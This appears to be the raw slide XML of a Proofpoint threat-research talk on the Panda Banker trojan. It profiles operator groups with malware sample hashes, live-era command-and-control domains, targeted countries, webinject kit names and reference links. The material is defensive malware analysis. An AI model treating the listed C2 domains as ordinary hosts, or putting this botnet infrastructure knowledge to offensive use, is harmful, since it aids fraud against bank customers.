              <a:t>0faba459f37dd11ad44631f644062421a9efed20b511279c9adfd0dc4729c0f5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: sincirewdo.ru, therepmeat.ru, nobotanri.ru, veintitna.ru, lachistontfi.ru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No webinjects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Hancitor Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F507BC-50B1-1B45-BA1A-625F70D49002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="381000"/>
            <a:ext cx="4929037" cy="5740991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30142331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51A9-5839-C442-9A31-F1B99A06C282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“NOP Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D853142-F55D-8747-82B6-0823CEF7D04F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625522" y="1215231"/>
            <a:ext cx="5257800" cy="4194969"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A0376C-934B-3946-94A0-AF0DEB6B8C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975576" y="1371600"/>
            <a:ext cx="5511290" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0A41F69-A7A7-6F45-8D6E-399562541E47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="679798" y="1371601"/>
            <a:ext cx="5179641" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F31E563-7AB6-514E-94A0-3A9A29FD27E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975576" y="5410200"/>
            <a:ext cx="5584919" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://twitter.com/reOnFleek/status/1064655055331168256</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6484C6-15A7-FB48-8B46-C34AE650D21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606169" y="5410200"/>
            <a:ext cx="5179641" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://twitter.com/JR0driguezB/status/1049596422964867072 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144856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463" y="2286000"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Samples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oldest: 4e36727282672b7ece395cf26ba581e5b264bff0f5898d557c9646d2ba37a0ec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: play2wright.top, pub3lished.top, re4present.top, second5ary.top, tec6nique.top, tole7rable.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newest: ae9ac49cf980c51b10e8f8ef7481542ff1d5a7468177091fd334a80b46338a63</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: chewkinyan.com, 554343rods13.top, 80m55453tr356.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> March 2017 – present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Versions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.2.14 – 2.6.9 (missing 17 versions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Botnets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“NOP Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8348256-90C6-5444-BAF7-FAAD535C272B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1143000"/>
            <a:ext cx="12192000" cy="1215431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36108973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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Targeting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Canada (March 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4e36727282672b7ece395cf26ba581e5b264bff0f5898d557c9646d2ba37a0ec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: play2wright.top, pub3lished.top, re4present.top, second5ary.top, tec6nique.top, tole7rable.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“.tables” and “r=” kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: plsfgpal.com, popelenga.info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Australia and Canada (October 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>13c01865f1f6be7f3abd7f887088783b58cb7264e3c81c774e0d3e38b3883ec1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: 80m533tr356.top, charter-paradise.com, 54or3rods13.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“.tables” and “r=” kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: plsfgpal.com, taberfix.top</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“NOP Gang”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4883829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Endangered Species ?</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2172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Endangered Species ?</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83255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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#pandabanker on Twitter/VirusTotal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#ZeusPandaBanker on Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@James_inthe_box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.malware-traffic-analysis.net/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://traffic.moe/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://zerophagemalware.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://urlhaus.abuse.ch/browse/signature/PandaZeuS/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“PandaZeuS” tag at https://sslbl.abuse.ch/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=4426&amp;p=29520&amp;hilit=panda#p28940</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zoo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1884489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fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://asert.arbornetworks.com/panda-bankers-future-dga/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.proofpoint.com/us/threat-insight/post/panda-banker-starts-looking-more-like-a-grizzly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1587" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.spamhaus.org/news/article/771/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.gdatasoftware.com/blog/2017/08/29928-analysis-zeus-panda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://threatvector.cylance.com/en_us/home/threat-spotlight-panda-banker-trojan-targets-the-us-canada-and-japan.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1587" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13451569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@tildedennis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dschwarz at proofpoint.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4213365297"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="Proofpoint">
      <a:dk1>
        <a:srgbClr val="66656C"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="F9EDD3"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="51788D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="6CAF94"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="51788D"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F47735"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="B6B197"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8C211E"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="63AEE6"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="51788D"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="8C211E"/>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latin typeface="Arial"/>
            <a:cs typeface="Aria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8978</TotalTime>
  <Words>8960</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>915</Paragraphs>
  <Slides>99</Slides>
  <Notes>99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ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Everything  Panda  banker</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Naming (Malware)</vt:lpstr>
      <vt:lpstr>Naming (Panel)</vt:lpstr>
      <vt:lpstr>Naming (Panel)</vt:lpstr>
      <vt:lpstr>Zeus Panda</vt:lpstr>
      <vt:lpstr>Same Same But Different</vt:lpstr>
      <vt:lpstr>First Contact </vt:lpstr>
      <vt:lpstr>First Contact </vt:lpstr>
      <vt:lpstr>All The Samples!</vt:lpstr>
      <vt:lpstr>Release Dates</vt:lpstr>
      <vt:lpstr>2018</vt:lpstr>
      <vt:lpstr>Version Activity</vt:lpstr>
      <vt:lpstr>Take Warning</vt:lpstr>
      <vt:lpstr>Version (2.1.0 - 2.5.7)</vt:lpstr>
      <vt:lpstr>Version (2.6.0 - present)</vt:lpstr>
      <vt:lpstr>Version (most Zeus variants)</vt:lpstr>
      <vt:lpstr>Windows API Function Calls (2.1.0 - 2.5.7)</vt:lpstr>
      <vt:lpstr>Windows API Function Calls (2.1.0 - 2.5.7)</vt:lpstr>
      <vt:lpstr>Windows API Function Calls (2.1.0 - 2.5.7)</vt:lpstr>
      <vt:lpstr>Encrypted Strings (2.1.0 – 2.2.9)</vt:lpstr>
      <vt:lpstr>Encrypted Strings (2.2.10 – 2.5.7)</vt:lpstr>
      <vt:lpstr>Encrypted Strings (2.6.0 – present)</vt:lpstr>
      <vt:lpstr>Encrypted Strings (2.6.10)</vt:lpstr>
      <vt:lpstr>BaseConfig (generic Zeus)</vt:lpstr>
      <vt:lpstr>BaseConfig (ZeusVM variants)</vt:lpstr>
      <vt:lpstr>BaseConfig (Panda Banker)</vt:lpstr>
      <vt:lpstr>Decrypting the BaseConfig (2.1.0 – 2.2.9)</vt:lpstr>
      <vt:lpstr>Decrypting the BaseConfig (2.3.1 – present)</vt:lpstr>
      <vt:lpstr>Decrypting the BaseConfig (2.3.1 – present)</vt:lpstr>
      <vt:lpstr>BaseConfig Botnet</vt:lpstr>
      <vt:lpstr>Static Botnets</vt:lpstr>
      <vt:lpstr>Static Botnets</vt:lpstr>
      <vt:lpstr>BaseConfig Key</vt:lpstr>
